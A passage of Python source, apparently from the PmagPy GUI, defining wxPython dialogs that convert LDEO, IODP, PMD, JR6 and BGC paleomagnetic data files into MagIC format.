magicoutfile=os.path.split(LDEO_file)[1]+\"_samples.txt\"\n samp_outfile=os.path.join(self.WD, magicoutfile)\n options_dict['samp_file'] = samp_outfile\n magicoutfile=os.path.split(LDEO_file)[1]+\"_sites.txt\"\n site_outfile=os.path.join(self.WD, magicoutfile)\n options_dict['site_file'] = site_outfile\n magicoutfile=os.path.split(LDEO_file)[1]+\"_locations.txt\"\n loc_outfile=os.path.join(self.WD, magicoutfile)\n options_dict['loc_file'] = loc_outfile\n experiment_type = self.bSizer2.return_value()\n options_dict['codelist'] = experiment_type\n if experiment_type:\n experiment_type = \"-LP \" + experiment_type\n lab_field = self.bSizer3.return_value()\n if lab_field:\n options_dict['labfield'], options_dict['phi'], options_dict['theta'] = lab_field.split()\n lab_field = \"-dc \" + lab_field\n ncn = self.bSizer4.return_value()\n options_dict['samp_con'] = ncn\n spc = self.bSizer5.return_value()\n options_dict['specnum'] = spc or 0\n if spc:\n spc = \"-spc \" + spc\n else:\n spc = \"-spc 0\"\n loc_name = self.bSizer6.return_value()\n options_dict['location'] = loc_name\n if loc_name:\n loc_name = \"-loc \" + loc_name\n replicate = self.bSizer8.return_value()\n if replicate:\n replicate = \"\"\n options_dict['noave'] = 0 # do average\n else:\n replicate = \"-A\"\n options_dict['noave'] = 1 # don't average\n AF_field = self.bSizer9.return_value()\n options_dict['peakfield'] = AF_field or 0\n if AF_field:\n AF_field = \"-ac \" + AF_field\n coil_number = self.bSizer10.return_value()\n options_dict['coil'] = coil_number\n if coil_number:\n coil_number = \"-V \" + coil_number\n mv = self.bSizer11.return_value()\n options_dict['mass_or_vol'] = mv\n COMMAND = \"ldeo_magic.py -f {0} -F {1} -Fsp {2} -Fsa {3} -Fsi {4} -Flo {5} {6} {7} -ncn {8} {9} {10} {11} {12} {13} -mv {14}\".format(LDEO_file, outfile, spec_outfile, samp_outfile, site_outfile, loc_outfile, experiment_type, lab_field, ncn, spc, loc_name, replicate, AF_field, coil_number, mv)\n # to run as module:\n program_ran, error_message = convert.ldeo(**options_dict)\n if program_ran:\n pw.close_window(self, COMMAND, outfile)\n else:\n pw.simple_warning(error_message)\n\n def on_helpButton(self, event):\n pw.on_helpButton(text=convert.ldeo.__doc__)\n\n\nclass convert_IODP_files_to_MagIC(convert_files_to_MagIC):\n\n \"\"\" \"\"\"\n\n def InitUI(self):\n\n pnl = 
self.panel\n\n TEXT = \"IODP format file\"\n bSizer_info = wx.BoxSizer(wx.HORIZONTAL)\n bSizer_info.Add(wx.StaticText(pnl, label=TEXT), wx.ALIGN_LEFT)\n\n #---sizer 0a ---\n TEXT = \"IODP file type\"\n self.bSizer0a = pw.radio_buttons(pnl, ['SRM discrete', 'SRM section', 'JR6', 'KLY4S'], \"Format: \", wx.HORIZONTAL)\n self.Bind(wx.EVT_RADIOBUTTON, self.on_switch_format)\n\n #self.bSizer0a = pw.labeled_yes_or_no(pnl, TEXT, label1, label2)\n #self.Bind(wx.EVT_RADIOBUTTON, self.on_switch_format, self.bSizer0a.rb1)\n #self.Bind(wx.EVT_RADIOBUTTON, self.on_switch_format, self.bSizer0a.rb2)\n\n #---sizer 0b ---\n TEXT = \"If you haven't already imported a samples data file from LIMS, please do so below!\\nThis is required to complete the SRM discrete import.\"\n self.bSizer0b = pw.simple_text(pnl, TEXT)\n\n #---sizer 0 ----\n self.bSizer0 = pw.choose_file(pnl, 'add', method = self.on_add_file_button)\n\n #---sizer 1 ----\n self.bSizer1 = pw.site_lat_lon(pnl)\n\n #---sizer 2 ----\n self.bSizer2 = pw.replicate_measurements(pnl)\n\n #---sizer 3 ----\n #self.bSizer1a = pw.labeled_text_field(pnl, 'Specimen volume, default is 12 cc.\\nPlease provide volume in cc.')\n self.bSizer3 = pw.labeled_text_field(pnl, 'Volume in cc, default is 7cc.')\n\n #---sizer 4 ---\n self.bSizer4 = pw.labeled_text_field(pnl, 'Depth Key, default is \"Depth CSF-B (m)\"')\n\n #---sizer 5 ---\n self.bSizer5 = pw.choose_file(pnl, 'add', method = self.on_add_samples_button,\n text=\"IODP samples data file downloaded from LIMS\")\n\n #---buttons ---\n hboxok = pw.btn_panel(self, pnl)\n\n #------\n vbox=wx.BoxSizer(wx.VERTICAL)\n\n vbox.AddSpacer(10)\n vbox.Add(bSizer_info, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer0a, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer0, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer1, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer2, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer0b, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer3, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer4, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer5, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n #vbox.Add(self.bSizer6, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n #vbox.Add(self.bSizer7, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n #vbox.AddSpacer(10)\n #vbox.Add(wx.StaticLine(pnl), 0, wx.ALL|wx.EXPAND, 5)\n vbox.Add(hboxok, flag=wx.ALIGN_CENTER)\n vbox.AddSpacer(20)\n\n # grey out what isn't initially needed\n self.bSizer3.text_field.Disable()\n self.bSizer3.label.SetForegroundColour((190, 190, 190))\n self.bSizer4.text_field.Disable()\n self.bSizer4.label.SetForegroundColour((190, 190, 190))\n\n\n self.hbox_all = wx.BoxSizer(wx.HORIZONTAL)\n self.hbox_all.AddSpacer(20)\n self.hbox_all.Add(vbox)\n self.hbox_all.AddSpacer(20)\n\n self.panel.SetSizer(self.hbox_all)\n self.panel.SetScrollbars(20, 20, 50, 50)\n self.hbox_all.Fit(self)\n self.Centre()\n self.Show()\n\n def on_okButton(self, event):\n os.chdir(self.WD)\n wait = wx.BusyInfo(\"Please wait, working...\\nFor large files, this may take a few minutes\")\n wx.SafeYield()\n wd = self.WD\n full_file = self.bSizer0.return_value()\n ID, IODP_file = os.path.split(full_file)\n if not ID:\n ID = '.'\n fmt = self.bSizer0a.return_value()\n if not IODP_file:\n article = \"an\" if fmt[0] == \"S\" else \"a\"\n pw.simple_warning(\"You must provide {} {} file to convert\".format(article, fmt))\n return\n outfile = IODP_file + \".magic\"\n spec_outfile = IODP_file[:IODP_file.find('.')] + 
\"_specimens.txt\"\n samp_outfile = IODP_file[:IODP_file.find('.')] + \"_samples.txt\"\n site_outfile = IODP_file[:IODP_file.find('.')] + \"_sites.txt\"\n loc_outfile = IODP_file[:IODP_file.find('.')] + \"_locations.txt\"\n replicate = self.bSizer2.return_value()\n if replicate: # do average\n noave = 0\n else: # don't average\n noave = 1\n try: lat,lon = self.bSizer1.return_value().split()\n except ValueError: lat,lon = '',''\n volume = self.bSizer3.return_value()\n if not volume and fmt != 'KLY4S':\n volume = 7\n comp_depth_key = self.bSizer4.return_value()\n dc_field = self.bSizer4.return_value()\n instrument = self.bSizer4.return_value()\n samp_infile = self.bSizer5.return_value()\n\n # if sample file is available, run that conversion first\n if samp_infile:\n program_ran, error_message = convert.iodp_samples_csv(samp_infile)\n if program_ran:\n print('-I- samples are read in')\n else:\n print('-W ', error_message)\n pw.simple_warning(\"Couldn't read in {}. Trying to continue with next step.\".format(samp_infile))\n\n if fmt == 'SRM section': # SRM section\n COMMAND = \"convert.iodp_srm_lore({}, {}, {}, noave={}, comp_depth_key={}, meas_file={}, lat={}, lon={})\".format(IODP_file, wd, ID, noave, comp_depth_key, outfile, lat, lon)\n program_ran, error_message = convert.iodp_srm_lore(IODP_file, wd, ID, noave=noave,\n comp_depth_key=comp_depth_key,\n meas_file=outfile,\n lat=lat, lon=lon)\n elif fmt == 'SRM discrete': # SRM discrete\n COMMAND = \"convert.iodp_dscr_lore({}, dir_path={}, input_dir_path={}, volume={}, noave={}, meas_file={}, spec_file='specimens.txt')\".format(IODP_file, wd, ID, volume, noave, outfile)\n # check for needed specimens file\n if not os.path.exists(os.path.join(wd, \"specimens.txt\")):\n pw.simple_warning(\"You need to provide an IODP samples data file\")\n return\n program_ran, error_message = convert.iodp_dscr_lore(IODP_file, dir_path=wd,\n input_dir_path=ID, volume=volume, noave=noave,\n meas_file=outfile, spec_file=\"specimens.txt\")\n\n elif fmt == \"JR6\":\n COMMAND = \"convert.iodp_jr6_lore({}, dir_path={}, input_dir_path={}, volume={}, noave={}, dc_field={}, meas_file={}, spec_file='specimens.txt')\".format(IODP_file, wd, ID, volume, noave, dc_field, outfile)\n program_ran, error_message = convert.iodp_jr6_lore(IODP_file, dir_path=wd,\n input_dir_path=ID, volume=volume, noave=noave,\n dc_field=dc_field,\n meas_file=outfile, spec_file=\"specimens.txt\")\n\n print(\"convert JR6\")\n\n elif fmt == \"KLY4S\":\n COMMAND = \"convert.iodp_kly4s_lore({}, meas_out={}, spec_infile='specimens.txt', spec_out='kly4s_specimens.txt', instrument={}, actual_volume={}, dir_path={}, input_dir_path={})\".format(IODP_file, outfile, instrument, volume, wd, ID)\n program_ran, error_message = convert.iodp_kly4s_lore(IODP_file, meas_out=outfile, spec_infile='specimens.txt',\n spec_out='kly4s_specimens.txt', instrument=instrument,\n actual_volume=volume, dir_path=wd, input_dir_path=ID)\n print(\"convert KLY4S\")\n\n print(COMMAND)\n if program_ran:\n pw.close_window(self, COMMAND, outfile)\n else:\n pw.simple_warning(error_message)\n\n\n del wait\n\n def on_switch_format(self, event):\n fmt = self.bSizer0a.return_value()\n if fmt == \"SRM section\":\n self.bSizer0b.static_text.SetLabel(\"Please provide Depth key and Volume below.\\nYou may optionally provide a samples data file.\")\n self.bSizer3.label.SetLabel('Volume in cc, default is 7cc.')\n self.bSizer3.text_field.Enable()\n self.bSizer3.label.SetForegroundColour(wx.BLACK)\n self.bSizer4.label.SetLabel('Depth Key, default is 
\"Depth CSF-B (m)\"')\n self.bSizer4.text_field.Enable()\n self.bSizer4.label.SetForegroundColour(wx.BLACK)\n elif fmt == \"SRM discrete\":\n self.bSizer0b.static_text.SetLabel(\"If you haven't already imported a samples data file from LIMS, please do so below!\\nThis is required to complete the SRM discrete import.\")\n self.bSizer3.text_field.Disable()\n self.bSizer3.label.SetForegroundColour((190, 190, 190))\n self.bSizer4.text_field.Disable()\n self.bSizer4.label.SetForegroundColour((190, 190, 190))\n elif fmt == \"JR6\":\n self.bSizer0b.static_text.SetLabel(\"If you haven't already imported a samples data file from LIMS, please do so below!\\nThis is required to complete the JR6 import.\")\n self.bSizer3.label.SetLabel('Volume in cc, default is 7cc.')\n self.bSizer3.text_field.Enable()\n self.bSizer3.label.SetForegroundColour(wx.BLACK)\n self.bSizer4.label.SetLabel('DC field, default is 50e-6 ')\n self.bSizer4.text_field.Enable()\n self.bSizer4.label.SetForegroundColour(wx.BLACK)\n elif fmt == \"KLY4S\":\n self.bSizer0b.static_text.SetLabel(\"Please provide Instrument name and actual specimen volume below (if known).\\nIf you haven't already imported a samples data file from LIMS, please do so below!\")\n self.bSizer3.label.SetLabel(\"Actual specimen volume\")\n self.bSizer3.text_field.Enable()\n self.bSizer3.label.SetForegroundColour(wx.BLACK)\n self.bSizer4.label.SetLabel('Instrument name, default is IODP-KLY4S ')\n self.bSizer4.text_field.Enable()\n self.bSizer4.label.SetForegroundColour(wx.BLACK)\n\n\n self.hbox_all.Fit(self)\n\n\n def on_add_samples_button(self, event):\n text = \"choose sample file downloaded from LIMS\"\n pw.on_add_file_button(self.bSizer5, text)\n\n\n def on_helpButton(self, event):\n fmt = self.bSizer0a.return_value()\n if fmt == 'SRM section':\n pw.on_helpButton(text=convert.iodp_srm_lore.__doc__)\n elif fmt == 'SRM discrete':\n pw.on_helpButton(text=convert.iodp_dscr_lore.__doc__)\n elif fmt == 'JR6':\n pw.on_helpButton(text=convert.iodp_jr6_lore.__doc__)\n elif fmt == 'KLY4S':\n pw.on_helpButton(text=convert.iodp_kly4s_lore.__doc__)\n\n\n\nclass convert_PMD_files_to_MagIC(convert_files_to_MagIC):\n \"\"\" \"\"\"\n\n def InitUI(self):\n pnl = self.panel\n\n TEXT = \"Folder containing one or more PMD format files\"\n bSizer_info = wx.BoxSizer(wx.HORIZONTAL)\n bSizer_info.Add(wx.StaticText(pnl, label=TEXT), wx.ALIGN_LEFT)\n\n #---sizer 0 ----\n self.bSizer0 = pw.choose_dir(pnl, 'add', method = self.on_add_dir_button)\n\n #---sizer 2 ----\n ncn_keys = ['XXXXY', 'XXXX-YY', 'XXXX.YY', 'XXXX[YYY] where YYY is sample designation, enter number of Y', 'sample name=site name', 'Site is entered under a separate column', '[XXXX]YYY where XXXX is the site name, enter number of X']\n self.bSizer2 = pw.select_ncn(pnl, ncn_keys)\n\n #---sizer 3 ---\n # TEXT = \"specify number of characters to designate a specimen, default = 0\"\n # self.bSizer3 = pw.labeled_text_field(pnl, TEXT)\n self.bSizer3 = pw.specimen_n(pnl)\n\n\n #---sizer 4 ----\n TEXT=\"Location name:\"\n self.bSizer4 = pw.labeled_text_field(pnl, TEXT)\n\n\n #---sizer 5 ----\n\n self.bSizer5 = pw.sampling_particulars(pnl)\n\n #---sizer 6 ---\n self.bSizer6 = pw.replicate_measurements(pnl)\n\n #---sizer 7 ---\n self.bSizer7 = pw.site_lat_lon(pnl)\n\n #---sizer 8 ----\n TEXT=\"Demagnetization Method: t for thermal, af for AF demag (optional):\\nDemag type is automatically detected for files using the H or M labels\\nfor AF demag or the T label for thermal demag in step names.\"\n \n self.bSizer8 = 
pw.labeled_text_field(pnl, TEXT)\n\n        #---buttons ---\n        hboxok = pw.btn_panel(self, pnl)\n\n        #------\n        vbox=wx.BoxSizer(wx.VERTICAL)\n\n        vbox.AddSpacer(10)\n        vbox.Add(bSizer_info, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n        vbox.Add(self.bSizer0, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n        vbox.Add(self.bSizer2, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n        vbox.Add(self.bSizer3, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n        vbox.Add(self.bSizer4, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n        vbox.Add(self.bSizer5, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n        vbox.Add(self.bSizer7, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n        vbox.Add(self.bSizer8, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n        vbox.Add(self.bSizer6, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n        vbox.Add(hboxok, flag=wx.ALIGN_CENTER)\n        vbox.AddSpacer(20)\n\n        hbox_all= wx.BoxSizer(wx.HORIZONTAL)\n        hbox_all.AddSpacer(20)\n        hbox_all.Add(vbox)\n        hbox_all.AddSpacer(20)\n\n        self.panel.SetSizer(hbox_all)\n        self.panel.SetScrollbars(20, 20, 50, 50)\n        hbox_all.Fit(self)\n        self.Centre()\n        self.Show()\n\n\n    def on_okButton(self, event):\n        os.chdir(self.WD)\n        options = {}\n        WD = self.WD\n        options['dir_path'] = WD\n        directory = self.bSizer0.return_value() or '.'\n        options['input_dir_path'] = directory\n        files = os.listdir(directory)\n        files = [str(f) for f in files if str(f).upper().endswith('.PMD')]\n        if files:\n            samp_outfile = files[0][:files[0].find('.')] + files[-1][:files[-1].find('.')] + \"_samples.txt\"\n            options['samp_file'] = samp_outfile\n        else:\n            #raise Exception(\"No pmd files found in {}, try a different directory\".format(WD))\n            pw.simple_warning(\"No pmd files found in {}, try a different directory\".format(WD))\n        ID = \"-ID \" + directory\n        ncn = self.bSizer2.return_value()\n        options['samp_con'] = ncn\n        spc = self.bSizer3.return_value() or 0\n        options['specnum'] = spc\n        loc_name = self.bSizer4.return_value()\n        options['location'] = loc_name\n        dmg = self.bSizer8.return_value().lower() # make lower case because the dmg options are t or af\n        options['dmg'] = dmg\n        if dmg != \"\" and dmg != \"t\" and dmg != \"af\":\n            pw.simple_warning(\"The only valid demagnetization methods are t and af, but the program received: %s\"%dmg)\n            return\n        if loc_name:\n            location = loc_name\n            loc_name = \"-loc \" + loc_name\n        particulars = self.bSizer5.return_value()\n        options['meth_code'] = particulars\n        if particulars:\n            particulars = \"-mcd \" + particulars\n        try: lat,lon = self.bSizer7.return_value().split()\n        except ValueError: lat,lon = '',''\n        options['lat'] = lat\n        options['lon'] = lon\n        lat = '-lat ' + lat\n        lon = '-lon ' + lon\n        replicate = self.bSizer6.return_value()\n        if replicate:\n            replicate = ''\n            options['noave'] = 0 # average\n        else:\n            replicate = '-A'\n            options['noave'] = 1 # don't average\n        for f in files:\n            options['mag_file'] = f\n            outfile = f + \".magic\"\n            options['meas_file'] = outfile\n            spec_outfile = f[:f.find('.')] + \"_specimens.txt\"\n            options['spec_file'] = spec_outfile\n            samp_outfile = f[:f.find('.')] + \"_samples.txt\"\n            options['samp_file'] = samp_outfile\n            site_outfile = f[:f.find('.')] + \"_sites.txt\"\n            options['site_file'] = site_outfile\n            loc_outfile = f[:f.find('.')] + \"_locations.txt\"\n            options['loc_file'] = loc_outfile\n            COMMAND = \"pmd_magic.py -WD {} -f {} -F {} -Fsp {} -Fsa {} -Fsi {} -Flo {} -dmg {} -ncn {} {} -spc {} {} {} {} {} {}\".format(WD, f, outfile, spec_outfile, samp_outfile, site_outfile, loc_outfile, dmg, ncn, particulars, spc, replicate, ID, loc_name, lat, lon)\n\n            program_ran, error_message = convert.pmd(**options)\n            if not program_ran:\n                pw.simple_warning(error_message)\n                
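# A minimal sketch of the demagnetization-method check made earlier in this
# handler: the PMD conversion accepts '' (autodetect from the step names),
# 't' (thermal), or 'af' (alternating field). validate_dmg is my own name,
# for illustration only; it is not part of pmag_gui.
def validate_dmg(dmg):
    """Normalize a demag-method string and reject anything invalid."""
    dmg = dmg.strip().lower()
    if dmg not in ('', 't', 'af'):
        raise ValueError("invalid demagnetization method: %r" % dmg)
    return dmg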
return False\n elif files.index(f) == len(files) -1:\n pw.close_window(self, COMMAND, outfile)\n else:\n print(\"Just ran equivalent of Python command: \", COMMAND)\n\n\n def on_helpButton(self, event):\n # to run as module:\n pw.on_helpButton(text=convert.pmd.__doc__)\n\n\nclass convert_JR6_files_to_MagIC(wx.Frame):\n\n \"\"\" \"\"\"\n title = \"PmagPy JR6 file conversion\"\n\n def __init__(self, parent, WD):\n wx.Frame.__init__(self, parent, wx.ID_ANY, self.title)\n self.panel = wx.ScrolledWindow(self)\n self.WD = WD\n self.InitUI()\n\n def InitUI(self):\n\n pnl = self.panel\n TEXT = \"JR6 format file (currently .txt format only)\"\n bSizer_info = wx.BoxSizer(wx.HORIZONTAL)\n bSizer_info.Add(wx.StaticText(pnl, label=TEXT), wx.ALIGN_LEFT)\n\n #---sizer 0a ----\n TEXT = \"JR6 file Type\"\n label1 = \".txt format\"\n label2 = \".jr6 format\"\n self.bSizer0a = pw.labeled_yes_or_no(pnl, TEXT, label1, label2)\n\n #---sizer 0b ---\n self.bSizer0b = pw.check_box(pnl, 'Joides Resolution')\n self.Bind(wx.EVT_CHECKBOX, self.on_check_joides, self.bSizer0b.cb)\n\n #---sizer 0 ----\n self.bSizer0 = pw.choose_file(pnl, btn_text='add measurement file', method = self.on_add_file_button)\n\n #---sizer 1b ----\n TEXT=\"User (Optional):\"\n self.bSizer1b = pw.labeled_text_field(pnl, TEXT)\n\n #---sizer 1c ----\n TEXT=\"Expedition (i.e. 312)\"\n self.bSizer1c = pw.labeled_text_field(pnl, TEXT)\n self.bSizer1c.ShowItems(False)\n\n #---sizer 1d ----\n TEXT=\"Hole name (i.e. U1456A)\"\n self.bSizer1d = pw.labeled_text_field(pnl, TEXT)\n self.bSizer1d.ShowItems(False)\n\n #---sizer 1 ----\n self.bSizer1 = pw.sampling_particulars(pnl)\n\n #---sizer 1a ---\n self.bSizer1a = pw.labeled_text_field(pnl, 'Specimen volume, default is 12 cc.\\nPlease provide volume in cc.')\n\n #---sizer 2 ---\n self.bSizer2 = pw.specimen_n(pnl)\n\n #---sizer 3 ----\n ncn_keys = ['XXXXY', 'XXXX-YY', 'XXXX.YY', 'XXXX[YYY] where YYY is sample designation, enter number of Y', 'sample name=site name']\n self.bSizer3 = pw.select_ncn(pnl, ncn_keys)\n\n #---sizer 4 ----\n TEXT=\"Location name:\"\n self.bSizer4 = pw.labeled_text_field(pnl, TEXT)\n\n #---sizer 6 ----\n self.bSizer6 = pw.site_lat_lon(pnl)\n\n #---sizer 5 ----\n self.bSizer5 = pw.replicate_measurements(pnl)\n\n #---buttons ---\n hboxok = pw.btn_panel(self, pnl)\n\n #------\n vbox=wx.BoxSizer(wx.VERTICAL)\n hbox0 = wx.BoxSizer(wx.HORIZONTAL)\n hbox0.AddMany([(self.bSizer0a,wx.ALIGN_LEFT|wx.TOP), (self.bSizer0b,wx.ALIGN_LEFT|wx.TOP)])\n\n vbox.AddSpacer(10)\n vbox.Add(bSizer_info, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(hbox0, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer0, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer1d, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer1c, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer1b, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer1, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer1a, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer2, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer3, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer4, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer6, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer5, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.AddSpacer(10)\n vbox.Add(wx.StaticLine(pnl), 0, wx.ALL|wx.EXPAND, 5)\n vbox.Add(hboxok, flag=wx.ALIGN_CENTER)\n vbox.AddSpacer(20)\n\n hbox_all= wx.BoxSizer(wx.HORIZONTAL)\n hbox_all.AddSpacer(20)\n hbox_all.Add(vbox)\n 
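# The JR6 dialog that starts above dispatches to one of three converters,
# mirroring the branching in its on_okButton further below: convert.jr6_txt
# for .txt files, convert.jr6_jr6 for .jr6 files, and convert.iodp_jr6 when
# the 'Joides Resolution' box is checked. A sketch of that dispatch, assuming
# the same `convert` module this file already uses (run_jr6_conversion is a
# hypothetical helper, not part of pmag_gui):
def run_jr6_conversion(options, input_format='txt', joides=False):
    """Pick the JR6 converter the same way on_okButton does."""
    if joides:
        return convert.iodp_jr6(**options)
    if input_format == 'txt':
        return convert.jr6_txt(**options)
    return convert.jr6_jr6(**options)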
hbox_all.AddSpacer(20)\n\n self.panel.SetSizer(hbox_all)\n self.panel.SetScrollbars(20, 20, 50, 50)\n hbox_all.Fit(self)\n self.Centre()\n self.Show()\n\n def on_check_joides(self, event):\n if self.bSizer0b.cb.IsChecked():\n self.bSizer0a.ShowItems(False)\n self.bSizer1.ShowItems(False)\n self.bSizer1a.ShowItems(False)\n self.bSizer2.ShowItems(False)\n self.bSizer3.ShowItems(False)\n self.bSizer4.ShowItems(False)\n self.bSizer1b.ShowItems(True)\n self.bSizer1c.ShowItems(True)\n self.bSizer1d.ShowItems(True)\n else:\n self.bSizer1b.ShowItems(False)\n self.bSizer1c.ShowItems(False)\n self.bSizer1d.ShowItems(False)\n self.bSizer0a.ShowItems(True)\n self.bSizer1.ShowItems(True)\n self.bSizer1a.ShowItems(True)\n self.bSizer2.ShowItems(True)\n self.bSizer3.ShowItems(True)\n self.bSizer4.ShowItems(True)\n self.panel.Layout()\n\n def on_add_file_button(self,event):\n text = \"choose file to convert to MagIC\"\n pw.on_add_file_button(self.bSizer0, text)\n\n def on_add_sampfile_button(self, event):\n text = \"choose samples type file\"\n pw.on_add_file_button(self.bSizer0c, text)\n\n def on_okButton(self, event):\n samp_file = ''\n options = {}\n input_format = self.bSizer0a.return_value()\n JR = self.bSizer0b.return_value()\n if input_format:\n input_format = 'txt'\n else:\n input_format = 'jr6'\n output_dir_path = self.WD\n options['dir_path'] = str(output_dir_path)\n input_dir_path, mag_file = os.path.split(self.bSizer0.return_value())\n if not mag_file:\n pw.simple_warning(\"You must select a JR6 format file\")\n return False\n options['input_dir_path'], options['mag_file'] = str(input_dir_path), str(mag_file)\n meas_file = os.path.split(mag_file)[1]+\".magic\"\n options['meas_file'] = str(meas_file)\n spec_file = os.path.split(mag_file)[1]+\"_specimens.txt\"\n options['spec_file'] = str(spec_file)\n samp_file = os.path.split(mag_file)[1]+\"_samples.txt\"\n options['samp_file'] = str(samp_file)\n site_file = os.path.split(mag_file)[1]+\"_sites.txt\"\n options['site_file'] = str(site_file)\n loc_file = os.path.split(mag_file)[1]+\"_locations.txt\"\n options['loc_file'] = str(loc_file)\n specnum = self.bSizer2.return_value()\n options['specnum'] = specnum\n samp_con = self.bSizer3.return_value()\n options['samp_con'] = samp_con\n user = self.bSizer1b.return_value()\n options['user'] = str(user)\n location = self.bSizer4.return_value()\n if location!='':\n options['location'] = str(location)\n expedition = self.bSizer1c.return_value()\n options['expedition'] = str(expedition)\n site = self.bSizer1d.return_value()\n options['site'] = str(site)\n average = self.bSizer5.return_value()\n if average:\n noave = 0\n else:\n noave = 1\n options['noave'] = noave\n meth_code = self.bSizer1.return_value()\n options['meth_code'] = meth_code\n try: lat,lon = self.bSizer6.return_value().split()\n except ValueError: lat,lon = '',''\n options['lat'] = lat\n options['lon'] = lon\n lat,lon = '-lat '+str(lat), '-lon '+str(lon)\n volume = self.bSizer1a.return_value()\n os.chdir(self.WD)\n COMMAND = \"\"\n\n # validate arguments;\n if volume!='':\n try:\n volume = float(volume)\n options['volume'] = volume\n except:\n pw.simple_warning(\"You must provide a valid quanity for volume, or no volume\")\n return False\n\n # validate file type and run jr6_magic:\n if not JR:\n if 'jr6' in input_format and 'jr6' not in mag_file.lower():\n pw.simple_warning(\"You must provide a .jr6 format file\")\n return False\n elif 'txt' in input_format and 'txt' not in mag_file.lower():\n pw.simple_warning(\"You must provide a .txt format 
file\")\n return False\n # remove unneeded options for jr6_txt/jr6_jr6\n for key in ['expedition', 'site']:\n try:\n options.pop(key)\n except KeyError:\n pass\n if input_format == 'txt': # .txt format\n program_ran, error_message = convert.jr6_txt(**options)\n if program_ran:\n COMMAND = \"options={}\\nconvert.jr6_txt(**options)\".format(str(options))\n pw.close_window(self, COMMAND, meas_file)\n else:\n pw.simple_warning(error_message)\n else:\n program_ran, error_message = convert.jr6_jr6(**options)\n if program_ran:\n COMMAND = \"options={}\\nconvert.jr6_jr6(**options)\".format(str(options))\n pw.close_window(self, COMMAND, meas_file)\n else:\n pw.simple_warning(error_message)\n else: # Joides Resolution\n if not mag_file:\n pw.simple_warning('You must provide a valid IODP JR6 file')\n program_ran, error_message = convert.iodp_jr6(**options)\n if program_ran:\n COMMAND = \"options={}\\nconvert.iodp_jr6(**options)\".format(str(options))\n pw.close_window(self, COMMAND, meas_file)\n else:\n pw.simple_warning(error_message)\n\n\n def on_cancelButton(self,event):\n self.Destroy()\n self.Parent.Raise()\n\n def on_helpButton(self, event):\n input_format = self.bSizer0a.return_value()\n if input_format:\n input_format = 'txt'\n else:\n input_format = 'jr6'\n if input_format == 'txt': # .txt format\n pw.on_helpButton(text=jr6_txt_magic.do_help())\n else:\n pw.on_helpButton(text=jr6_jr6_magic.do_help())\n\n\nclass convert_BGC_files_to_magic(wx.Frame):\n\n \"\"\" \"\"\"\n title = \"PmagPy BGC file conversion\"\n\n def __init__(self, parent, WD, title):\n wx.Frame.__init__(self, parent, wx.ID_ANY, self.title)\n self.panel = wx.ScrolledWindow(self)\n self.WD = WD\n self.InitUI()\n\n def InitUI(self):\n\n pnl = self.panel\n\n text = \"convert Berkeley Geochronology Center file to MagIC format\"\n bSizer_info = wx.BoxSizer(wx.HORIZONTAL)\n bSizer_info.Add(wx.StaticText(pnl, label=text), wx.ALIGN_LEFT)\n\n #---sizer 0 ----\n self.bSizer0 = pw.choose_file(pnl, 'add', method = self.on_add_file_button)\n\n #---sizer 1a ----\n self.bSizer1a = pw.labeled_text_field(pnl, 'User (Optional):')\n\n #---sizer 1 ----\n self.bSizer1 = pw.labeled_text_field(pnl, 'Location name:')\n\n #---sizer 2 ----\n self.bSizer2 = pw.labeled_text_field(pnl, 'Site name (if using convention bellow leave blank):')\n # sitename\n\n #---sizer 3 ----\n self.bSizer3 = pw.sampling_particulars(pnl)\n # meth codes\n\n #---sizer 4 ----\n self.bSizer4 = pw.replicate_measurements(pnl)\n # average replicates\n\n #---sizer 5 ---\n self.bSizer5 = pw.labeled_text_field(pnl, 'Provide specimen volume in cubic centimeters\\nNote: the volume given in data file will be used unless it equals 0.0 ')\n\n #---sizer 6 ----\n self.bSizer6 = pw.select_ncn(pnl)\n\n #---sizer 7 ----\n TEXT = \"specify number of characters to designate a specimen, default = 0\"\n self.bSizer7 = pw.specimen_n(pnl)\n\n\n #---buttons ---\n hboxok = pw.btn_panel(self, pnl)\n\n\n #------\n vbox=wx.BoxSizer(wx.VERTICAL)\n\n vbox.AddSpacer(10)\n vbox.Add(bSizer_info, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer0, flag=wx.ALIGN_LEFT|wx.TOP, 